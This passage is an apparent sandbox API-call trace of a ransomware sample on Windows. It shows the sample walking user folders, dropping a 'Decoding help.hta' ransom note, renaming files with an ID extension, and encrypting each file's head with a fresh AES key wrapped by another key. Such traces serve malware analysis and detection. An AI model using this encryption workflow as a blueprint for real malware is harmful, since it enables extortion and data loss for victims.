Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.096] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.096] CreateFileMappingA (hFile=0x708, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ac [0043.096] CryptAcquireContextA (in: phProv=0x1769fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1769fcec*=0x3448c70) returned 1 [0043.097] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x1769fce8 | out: phKey=0x1769fce8*=0x671ab0) returned 1 [0043.097] CryptExportKey (in: hKey=0x671ab0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1769fbe4, pdwDataLen=0x1769fce4 | out: pbData=0x1769fbe4*, pdwDataLen=0x1769fce4*=0x2c) returned 1 [0043.097] MapViewOfFile (hFileMappingObject=0x6ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100) returned 0x8cb0000 [0043.100] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1769fbe4*, pdwDataLen=0x1769fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1769fbe4*, pdwDataLen=0x1769fcf8*=0x100) returned 1 [0043.100] CryptEncrypt (in: hKey=0x671ab0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000*, pdwDataLen=0x1769fce4*=0x100, dwBufLen=0x100 | out: pbData=0x8cb0000*, pdwDataLen=0x1769fce4*=0x100) returned 1 [0043.100] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.101] CloseHandle (hObject=0x6ac) returned 1 [0043.101] CryptDestroyKey (hKey=0x671ab0) returned 1 [0043.101] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.101] SetFilePointerEx (in: hFile=0x708, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.101] WriteFile (in: hFile=0x708, lpBuffer=0x1769fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1769fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1769fbe4*, lpNumberOfBytesWritten=0x1769fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.102] WriteFile (in: hFile=0x708, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1769fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1769fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.102] CloseHandle (hObject=0x708) returned 1 [0043.103] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.103] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x1769fd30 | out: lpFindFileData=0x1769fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0043.104] FindClose (in: hFindFile=0x671a70 | out: hFindFile=0x671a70) returned 1 Thread: id = 356 os_tid = 0xa88 [0043.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x177dfd30 | out: lpFindFileData=0x177dfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671a70 [0043.105] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.105] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x177dfd30 | out: lpFindFileData=0x177dfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.106] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.106] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x177dfd30 | out: lpFindFileData=0x177dfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0043.106] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0043.106] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned 46 [0043.106] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" [0043.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decoding help.hta")) returned 0xffffffff [0043.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.110] WriteFile (in: hFile=0x708, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x177dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.110] CloseHandle (hObject=0x708) returned 1 [0043.111] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.111] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0043.111] lstrlenW (lpString="desktop.ini") returned 11 [0043.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0043.111] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned 46 [0043.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" [0043.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" [0043.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0043.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.112] CreateFileMappingA (hFile=0x708, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ac [0043.112] CryptAcquireContextA (in: phProv=0x177dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x177dfcec*=0x3448c70) returned 1 [0043.113] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x177dfce8 | out: phKey=0x177dfce8*=0x671b70) returned 1 [0043.113] CryptExportKey (in: hKey=0x671b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x177dfbe4, pdwDataLen=0x177dfce4 | out: pbData=0x177dfbe4*, pdwDataLen=0x177dfce4*=0x2c) returned 1 [0043.113] MapViewOfFile (hFileMappingObject=0x6ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200) returned 0x8cb0000 [0043.115] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x177dfbe4*, pdwDataLen=0x177dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x177dfbe4*, pdwDataLen=0x177dfcf8*=0x100) returned 1 [0043.115] CryptEncrypt (in: hKey=0x671b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000*, pdwDataLen=0x177dfce4*=0x200, dwBufLen=0x200 | out: pbData=0x8cb0000*, pdwDataLen=0x177dfce4*=0x200) returned 1 [0043.115] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.117] CloseHandle (hObject=0x6ac) returned 1 [0043.117] CryptDestroyKey (hKey=0x671b70) returned 1 [0043.117] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.117] SetFilePointerEx (in: hFile=0x708, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.117] WriteFile (in: hFile=0x708, lpBuffer=0x177dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x177dfbe4*, lpNumberOfBytesWritten=0x177dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.118] WriteFile (in: hFile=0x708, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x177dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.118] CloseHandle (hObject=0x708) returned 1 [0043.119] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.119] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x177dfd30 | out: lpFindFileData=0x177dfd30*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0043.119] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0043.119] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned 46 [0043.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" [0043.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decoding help.hta")) returned 0x1 [0043.119] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Everywhere.search-ms") returned -1 [0043.119] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0043.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0043.119] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned 46 [0043.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0043.119] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0043.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.[ID]g9uZrLhJaygpwRm1[ID]" [0043.119] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0043.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.120] CreateFileMappingA (hFile=0x708, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ac [0043.120] CryptAcquireContextA (in: phProv=0x177dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x177dfcec*=0x3448c70) returned 1 [0043.121] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x177dfce8 | out: phKey=0x177dfce8*=0x671ab0) returned 1 [0043.121] CryptExportKey (in: hKey=0x671ab0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x177dfbe4, pdwDataLen=0x177dfce4 | out: pbData=0x177dfbe4*, pdwDataLen=0x177dfce4*=0x2c) returned 1 [0043.121] MapViewOfFile (hFileMappingObject=0x6ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe0) returned 0x8cb0000 [0043.123] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x177dfbe4*, pdwDataLen=0x177dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x177dfbe4*, pdwDataLen=0x177dfcf8*=0x100) returned 1 [0043.124] CryptEncrypt (in: hKey=0x671ab0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000*, pdwDataLen=0x177dfce4*=0xe0, dwBufLen=0xe0 | out: pbData=0x8cb0000*, pdwDataLen=0x177dfce4*=0xe0) returned 1 [0043.124] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.125] CloseHandle (hObject=0x6ac) returned 1 [0043.125] CryptDestroyKey (hKey=0x671ab0) returned 1 [0043.126] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.126] SetFilePointerEx (in: hFile=0x708, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.126] WriteFile (in: hFile=0x708, lpBuffer=0x177dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x177dfbe4*, lpNumberOfBytesWritten=0x177dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.127] WriteFile (in: hFile=0x708, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x177dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.127] CloseHandle (hObject=0x708) returned 1 [0043.128] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.128] FindNextFileW (in: hFindFile=0x671a70, lpFindFileData=0x177dfd30 | out: lpFindFileData=0x177dfd30*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0043.128] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0043.128] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned 46 [0043.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" [0043.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\decoding help.hta")) returned 0x1 [0043.128] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Indexed Locations.search-ms") returned -1 [0043.128] lstrlenW (lpString="Indexed Locations.search-ms") returned 27 [0043.128] lstrcmpiW (lpString1="[ID]", lpString2="h-ms") returned -1 [0043.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0043.128] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned 46 [0043.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0043.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0043.128] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.[ID]g9uZrLhJaygpwRm1[ID]" [0043.128] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1 [0043.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.129] CreateFileMappingA (hFile=0x708, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6ac [0043.130] CryptAcquireContextA (in: phProv=0x177dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x177dfcec*=0x3448c70) returned 1 [0043.130] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x177dfce8 | out: phKey=0x177dfce8*=0x671b70) returned 1 [0043.130] CryptExportKey (in: hKey=0x671b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x177dfbe4, pdwDataLen=0x177dfce4 | out: pbData=0x177dfbe4*, pdwDataLen=0x177dfce4*=0x2c) returned 1 [0043.130] MapViewOfFile (hFileMappingObject=0x6ac, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe0) returned 0x8cb0000 [0043.135] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x177dfbe4*, pdwDataLen=0x177dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x177dfbe4*, pdwDataLen=0x177dfcf8*=0x100) returned 1 [0043.135] CryptEncrypt (in: hKey=0x671b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000*, pdwDataLen=0x177dfce4*=0xe0, dwBufLen=0xe0 | out: pbData=0x8cb0000*, pdwDataLen=0x177dfce4*=0xe0) returned 1 [0043.135] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.136] CloseHandle (hObject=0x6ac) returned 1 [0043.136] CryptDestroyKey (hKey=0x671b70) returned 1 [0043.136] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.136] SetFilePointerEx (in: hFile=0x708, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.136] WriteFile (in: hFile=0x708, lpBuffer=0x177dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x177dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x177dfbe4*, lpNumberOfBytesWritten=0x177dfcf8*=0x100, lpOverlapped=0x0) returned 1 